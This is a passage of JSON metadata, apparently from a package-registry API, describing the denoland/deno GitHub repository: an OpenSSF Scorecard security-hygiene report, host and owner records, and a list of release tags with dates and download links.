s/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T